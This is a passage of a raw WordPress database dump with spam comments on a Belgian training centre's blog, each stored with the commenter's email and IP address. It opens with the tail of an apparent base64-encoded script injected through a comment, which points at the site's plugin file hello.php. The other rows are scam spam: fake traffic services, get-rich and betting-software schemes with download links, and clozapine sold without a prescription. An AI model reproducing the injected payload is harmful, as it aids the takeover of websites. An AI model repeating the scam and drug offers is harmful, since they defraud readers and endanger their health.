plbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9\\\'))\" &gt; --><a></a>] Edit or delete it, then start blogging!', 0, '0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', '', 0, 0),
(116, 1, 'Anne', 'cmhifu@aol.com', 'http://qa.juststicky.com/yourls/275f', '192.69.255.179', '2014-12-19 23:16:40', '2014-12-19 23:16:40', 'You need targeted traffic to your Hello world! | Cross Training Center (Namur - Limelette) website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://qa.juststicky.com/yourls/275f', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(117, 1, 'PatrickSn', 'seroff.grigoriig@yandex.com', '', '95.139.116.91', '2014-12-22 10:17:45', '2014-12-22 10:17:45', '2 Blocks Tofu  mountain bike reviews specialized road bike brands bicycle <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bike reviews</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike reviews forums</a> <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">trek 820 mountain bike sizing</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike review for beginners</a> This Video Player Requires JavaScript. It has come to our attention that the browser you are using is either not running JavaScript or out of date. Please enable javascript and/or update your browser if possible.  http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html \r\n\"Our typical student is a perfectionist and loves words, loves language,\" said Ortiz. \"Many of our students have musical backgrounds. A lot of them have played the piano.\"  mountain bike reviews 2015 road bike review trek 1 1 <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bike reviews full suspension</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">cannondale road bike size calculator</a> By Will Carless, GlobalPost   http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html      <a href=\"http://www.bikesizesforkids.com/how-to-select-the-right-mountain-bike.html\" rel=\"nofollow\">mountain bikes walmart</a> <a href=\"http://www.bikesizesforkids.com/tips-and-instructions-for-road-bike-sizing.html\" rel=\"nofollow\">road bike size calculator inseam</a> \r\n \r\n<a href=\"http://thtml5.com/forum.php?mod=forumdisplay&amp;fid=40\" rel=\"nofollow\">mountain bikes online road bike reviews 2012 mountain bike reviews 2014 road bike brands wiki</a>\r\n<a href=\"http://www.army-new.ru/forum1/viewtopic.php?f=9&amp;t=9400\" rel=\"nofollow\">mountain bikes for sale road bike brands for beginners mountain bikes uk road bike brands list</a>\r\n<a href=\"http://www.baiheyuleguanwang.org/home.php?mod=space&amp;uid=4\" rel=\"nofollow\">mountain bike size for man road bike reviews uk mountain bikes on sale road bike wheel size calculator</a>\r\n<a href=\"http://www.trapmusicforums.com/viewtopic.php?f=1&amp;t=15016\" rel=\"nofollow\">specialized epic mountain bike sizing road bike brands list mountain bike size for man cannondale road bike size calculator</a>\r\n<a href=\"http://babyisking.com/home.php?mod=space&amp;uid=651411\" rel=\"nofollow\">mountain bike reviews 2014 road bike brands to avoid 29er mountain bike height road bike reviews under 1000</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', '', 0, 0),
(118, 1, 'PumaRachel', 'rachellews@outlook.com', 'http://residence-hotel.ru/', '62.210.131.222', '2014-12-23 11:01:41', '2014-12-23 11:01:41', 'Bedankt voor de nuttige informatie . Wilt u uw blog toe te voegen aan bladwijzers', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36 OPR/26.0.1656.24', '', 0, 0),
(119, 1, 'WilliamMn', 'williamonem@yandex.com', 'http://clozapinecheaporder-xp252.soup.io', '195.154.168.235', '2015-01-09 23:10:05', '2015-01-09 23:10:05', 'online generic clozaril buying without a prescription ohio  <a href=\"http://buyclozarilcheap-zx145.soup.io\" rel=\"nofollow\">cost of clozaril tablet in llanfair caereinion</a>  clozaril gel e at nottingham  <a href=\"http://clozapinecheaporder-z416.soup.io\" rel=\"nofollow\">clozaril online mastercard fedex, purchase clozaril discount fast</a>  order clozaril zolafren no rx in thirsk  <a href=\"http://online-order-clozaril-dl403.soup.io\" rel=\"nofollow\">pharmacy clozaril tabs no doctors</a>  generic sales clozaril in cardiff  <a href=\"http://clozarilcheapbuy-d339.soup.io\" rel=\"nofollow\">clozaril online visa no doctors at looe</a>  clozaril ups c.o.d. at nm llano  <a href=\"http://cheap-clozaril-order-ul443.soup.io\" rel=\"nofollow\">low cost clozaril moneygram saturday delivery in illinois</a>  clozaril cheap clozaril  <a href=\"http://cheap-order-clozaril-dw338.soup.io\" rel=\"nofollow\">clozaril ziprasidone risperidone haloperidol</a>', 0, '0', 'Mozilla/5.0 (Windows NT 5.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', '', 0, 0),
(120, 1, 'PatriciaBeem seo manager', 'patricialinser@hotmail.com', 'http://next-gen-seo-traffic.com', '46.118.116.33', '2015-01-17 07:00:57', '2015-01-17 07:00:57', 'This is a very good tip particularly to those fresh to the blogosphere. Brief but very accurate info… Appreciate your sharing this one. A must read post!', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', '', 0, 0),
(121, 1, 'Abby', 'wzwceqwbsx@aol.com', 'http://cmyad.co/i/5b58', '23.232.158.140', '2015-01-21 05:34:09', '2015-01-21 05:34:09', 'I came to your Hello world! | Cross Training Center (Namur - Limelette) page and noticed you could have a lot more hits. I have found that the key to running a website is making sure the visitors you are getting are interested in your niche. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://anders.ga/1oahd', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(122, 1, 'Hannahcib', 'laura-ferksen89@outlook.com', 'http://skyrocket-web-traffic.com', '46.119.124.10', '2015-02-11 21:37:48', '2015-02-11 21:37:48', 'Hi www.crosstrainingcenter.be admin, noticed you have nice website and really liked your post. Not so many comments though, \r\nso just thought I could recommend you seo website http://skyrocket-web-traffic.com which will get hundreds and thousands laser targeted visitors from Google 1st page for your site in no time. They use only time tested and 1 year deep researched white hat methods which actually work in today\'s seo world. Have a nice day and hope next time I visit your site it will be lot more popular. \r\nRegards your friend Laura.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36', '', 0, 0),
(123, 1, 'Jasminebal', 'jasmine-lucky777@outlook.com', 'http://12k-cash-software.com/Download.html', '178.137.162.171', '2015-02-23 20:08:06', '2015-02-23 20:08:06', 'Hi www.crosstrainingcenter.be admin I bet you wanna make more money? So how about \r\n \r\nthe insider secret software cashing $12,234 in 2 months? \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nThat\'s what you can make and it is much more easy as internet marketing... \r\n \r\nLet me get it straight. \r\n \r\nI dont care about sports. Shame on me but I dont even know the \r\nfootball rules. Never cared less. \r\n \r\nWhat I care about is making money for me and my family. \r\n \r\nI tried everything from stocks &amp; forex to internet marketing and \r\naffiliate programs.. I even made some money but then blew it all away \r\nwhen the stock market went south. \r\n \r\nWhat I was looking is the long term solution that can give me an edge. \r\nI think I finally found it. It is called Z code system. \r\n \r\nZ Code is not about sports. It is about following the system and \r\nwinning in a long run. That is why it is called sports investing and \r\nnot gambling. \r\n \r\nGuys will send you game picks and the predictions from the insider \r\ninfo based on their precise statistical model proven since 1999. \r\n \r\nYou place the bets and win. That\'s it. \r\n \r\nDon\'t take my word on it. Check out the proof video here: \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nThese guys combine the power of their human cappers who are experts in \r\nsports with the power of technology: statistical data since 1999. \r\nTheir wins are documented and proven - each winning and losing pick is \r\navailable for members to check and verify in the members zone. \r\n \r\nThe performance chart goes straight into profits. Over $12,000 usd \r\nprofit for average bet of $100 during the last 2 months! \r\n \r\nNo wonder... I mean, \r\n \r\neven if you are skeptical you really NEED to check out how transparent \r\nthese guys truly are... \r\nVideos of bank accounts stuffed with money, videos of bookmaker \r\naccounts, screenshots proving how effective this killer software is, \r\nvideos of how to make the money risk free, hundreds of real people \r\ntestimonials... \r\n \r\n...proof, proof, and more proof!!  All sitting there for you to \r\nabsorb! Don\'t take my word for it - you have to see it to believe it. \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\nAnd the best part about it is just how easy it is to use!  Everything \r\nabout this product is TOP class- \r\n \r\n- from the software itself \r\n- to the video tutorials showing how to use the software &amp; picks \r\n- to the comprehensive FAQ &amp; Money management tips \r\n- to the well trained support team lead by Anny. \r\n \r\nThese guys have everything covered! \r\n \r\nCheck it out for yourself: \r\n \r\nhttp://12k-cash-software.com/Download.html \r\n \r\n \r\nYour friend Jasmine', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36', '', 0, 0),
(124, 1, 'RebekavonO', 'rebeka-forken@outlook.com', 'http://get-high-pr-links.com', '37.115.189.79', '2015-03-09 04:25:21', '2015-03-09 04:25:21', 'Hi www.crosstrainingcenter.be admin did you know what’s the secret how big company sites get large targeted traffic and exposure in Google 1st page results for the most competitive keywords? \r\nHer\'s answer how you can get same massive targeted traffic to your blog and it is straigtforward - \r\n \r\nhigh PR backlinks - http://get-high-pr-links.com, but just good links which counts as votes for your website giving Google no option but to skyrocket your site search engine positions to results so your customers can find your website at the top of Google search results.  Today is your lucky day because I’m going to reveal you top resource of greatest of the greatest links from 500’000 website network! \r\n*buy Links from actual PR page websites with low outbound links maximum 10 \r\n* Skyrocket your site rankings for your related search term and get insane laser targeted traffic.  Buy high pr links at http://get-high-pr-links.com \r\nyour friend Rebeka.', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 YaBrowser/14.10.2062.12061 Safari/537.36', '', 0, 0),
(125, 1, 'Danielle', 'waftembxhy@hotmail.fr', 'http://pixz.nu/2fqB', '23.108.170.197', '2015-03-18 23:25:54', '2015-03-18 23:25:54', 'I discovered your Hello world! | Cross Training Center (Namur - Limelette) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your niche. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my site. Check it out here: http://kout.eu/2y9i', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(126, 1, 'LindaOr', 'linda_sanchezter720@outlook.com', 'http://soft-making-half-million.com/downloadnow.html', '37.115.189.79', '2015-03-26 00:04:52', '2015-03-26 00:04:52', 'After getting more than 11000 visitors/day to my new website and earning $16452 first week I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic &amp; money... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://soft-making-half-million.com/downloadnow.html \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://soft-making-half-million.com/downloadnow.html \r\nBest regards \r\nYour old friend Linda', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', '', 0, 0),
(127, 1, 'Catherine', 'hpidwo@dayrep.com', 'http://s.ihaus.co.uk/x3', '104.168.70.17', '2015-04-10 03:33:44', '2015-04-10 03:33:44', 'Hi, my name is Catherine and I am the sales manager at StarSEO Marketing. I was just looking at your Hello world! | Cross Training Center (Namur - Limelette) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are interested in niches like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/ij - Now, let me ask you... Do you need your website to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the network I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular sites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://1be.info/3o3a', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(128, 1, 'Catherine', 'menqhseqs@dayrep.com', 'http://bbqr.me/ij', '23.94.186.73', '2015-04-13 09:39:25', '2015-04-13 09:39:25', 'Hi, my name is Catherine and I am the sales manager at StarSEO Marketing. I was just looking at your Hello world! | Cross Training Center (Namur - Limelette) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for niches like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/ij - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular websites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://s.ihaus.co.uk/x3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(129, 1, 'Olivie', 'jkweftbfj@hotmail.com', 'http://bbqr.me/mu', '104.168.67.69', '2015-04-22 18:25:59', '2015-04-22 18:25:59', 'Hi my name is Olivie and I just wanted to drop you a quick note here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get targeted visitors from and they let you try their service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://tf3.info/uu', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(130, 1, 'Olivie', 'fgpoiz@hotmail.com', 'http://tf3.info/uu', '104.168.63.93', '2015-05-04 16:06:10', '2015-05-04 16:06:10', 'Hi my name is Olivie and I just wanted to drop you a quick note here instead of calling you. I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your niche. There is a company that you can get targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my website. Visit them here: http://esyok.com/shirt/b9', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(131, 1, 'Delphine', 'lokskoqent@yahoo.co.uk', 'http://s.marcusmo.co.uk/5ot', '104.168.42.39', '2015-05-20 05:41:06', '2015-05-20 05:41:06', 'Hi, my name is Delphine and I am the marketing manager at SwingSEO Solutions. I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://zoy.bz/4nm - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://txsc.us/t4bg - or to unsubscribe please go here: http://innovad.ws/8h9dp', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(132, 1, 'MichaelPr', 'ms_sophia_taylor@outlook.com', 'http://www.2000-usd-per-day.com/download.html', '46.119.112.121', '2015-05-26 14:33:42', '2015-05-26 14:33:42', 'Hi, www.crosstrainingcenter.be admin how about finally earning \r\n$1500-$2500/day without lifting a finger? \r\n \r\nIf making money online COULD be \r\nas easy as writing your own check… \r\n \r\nThis might be it. \r\nhttp://www.2000-usd-per-day.com/download.html \r\n \r\n3 minutes into the video? Yep. That’s \r\na $10000-$15000/week, right there. \r\n \r\n… All made with virtually no effort. \r\n \r\nWatch it and see for yourself. Download and copy exact system for yourself here: \r\nhttp://www.2000-usd-per-day.com/download.html \r\n \r\nYour old friend Sophia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', '', 0, 0),
(133, 1, 'money for surveys', 'karen-garcia@hotmail.com', 'http://www.take-surveys-earn-cash.com/surveys.html', '46.118.158.187', '2015-06-09 20:33:52', '2015-06-09 20:33:52', 'Earn up to $3500/month just answering simple surveys \r\nAverage people just like you are earning ~3500usd month just for taking simple surveys.... \r\nnow it\'s your time \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\nHi www.crosstrainingcenter.be admin just wanted to let you know \r\n \r\nThere\'s an incredible new opportunity \r\nthat just grabbed my attention! \r\n \r\nIt\'s almost too good to be true. Big \r\ncompanies are paying people just for giving \r\ntheir opinions! I can\'t believe this guy and others are cashing out money just for filling out simple surveys read here how they are doing this: \r\n \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\n \r\n \r\nThat\'s right! I\'m not kidding, all you\'ve got \r\nto do is complete simple surveys and these \r\ncompanies will pay you fat cash for it and it does not mater form which country you are, they need people from all over world! \r\n \r\nYou\'ve got to see this in video. \r\n \r\nhttp://www.take-surveys-earn-cash.com/surveys.html \r\n \r\nBut the truth is... they\'re not letting \r\nvery many people join the program so \r\nyou\'ve got to hurry! \r\n \r\nSee you there! \r\nyour old friend! \r\nKaren', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.17', '', 0, 0),
(134, 1, 'moving companies', 'ayjbiel@gmail.com', 'http://pepperhome.ru/?option=com_k2&amp;view=itemlist&amp;task=user&amp;id=98720', '78.244.88.55', '2015-06-17 21:14:59', '2015-06-17 21:14:59', 'Superb post however I was wondering if you could write a litte more on this topic? I\'d be very grateful if you could elaborate a little bit more. Appreciate it!|', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(135, 1, 'moving interstate australia', 'goslcsdxc@gmail.com', 'http://bgnovinata.com/component/k2/itemlist/user/127115', '213.220.219.150', '2015-06-18 20:24:49', '2015-06-18 20:24:49', 'I have been browsing online more than 4 hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. In my view, if all webmasters and bloggers made good content as you did, the net will be a lot more useful than ever before.|', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(136, 1, 'Donna', 'yzeatkzl@tom.com', 'http://www.kaktusit.com/a252', '107.172.6.73', '2015-07-20 09:27:59', '2015-07-20 09:27:59', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://gf10.com.br/url/iq2f - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://cabkit.in/e137', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(137, 1, 'Donna', 'wuxlqivgs@tom.com', 'http://www.kaktusit.com/a252', '172.245.120.6', '2015-07-29 15:57:41', '2015-07-29 15:57:41', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://bbqr.me/4fj5 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular sites are using this network to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://www.kaktusit.com/a252', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(138, 1, 'Donna', 'xnqzfry@tom.com', 'http://bbqr.me/4fj5', '23.94.170.143', '2015-08-05 22:22:38', '2015-08-05 22:22:38', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your website on this network you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: https://spna.ca/1pvm - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://www.urlator.co/w7uk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(139, 1, 'Valerie', 'jztmaaxqwks@tom.com', 'http://digitalvikn.com.br/u/nk00', '23.94.170.211', '2015-08-12 08:49:20', '2015-08-12 08:49:20', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your site on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://ittsy.com/it/3x - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the service I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.urlator.co/w7uk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(140, 1, 'Valerie', 'eahmfzixp@tom.com', 'http://www.urlator.co/w7uk', '23.94.173.64', '2015-08-20 20:32:25', '2015-08-20 20:32:25', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://www.urlator.co/w7uk - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://bbqr.me/4fj5', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(141, 1, 'Lindsey', 'vzigsng@tom.com', 'https://spna.ca/1pvm', '23.95.196.194', '2015-09-09 13:01:56', '2015-09-09 13:01:56', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your website on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://digitalvikn.com.br/u/nk00 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.arvut.org/1/dft', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(142, 1, 'Lindsey', 'wxaawanejq@tom.com', 'http://ittsy.com/it/3x', '23.94.173.64', '2015-09-17 01:49:37', '2015-09-17 01:49:37', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and most of the users are looking for websites like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://tgi.link/dcf2 - Now, let me ask you... Do you need your site to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular websites are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://www.arvut.org/1/dft', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(143, 1, 'Lindsey', 'ffsspscbio@tom.com', 'http://ittsy.com/it/3x', '107.173.168.72', '2015-09-26 14:20:29', '2015-09-26 14:20:29', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you didn\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your website on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://bbqr.me/4fj5 - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your site on the service I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything. All the popular sites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://tgi.link/dcf2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
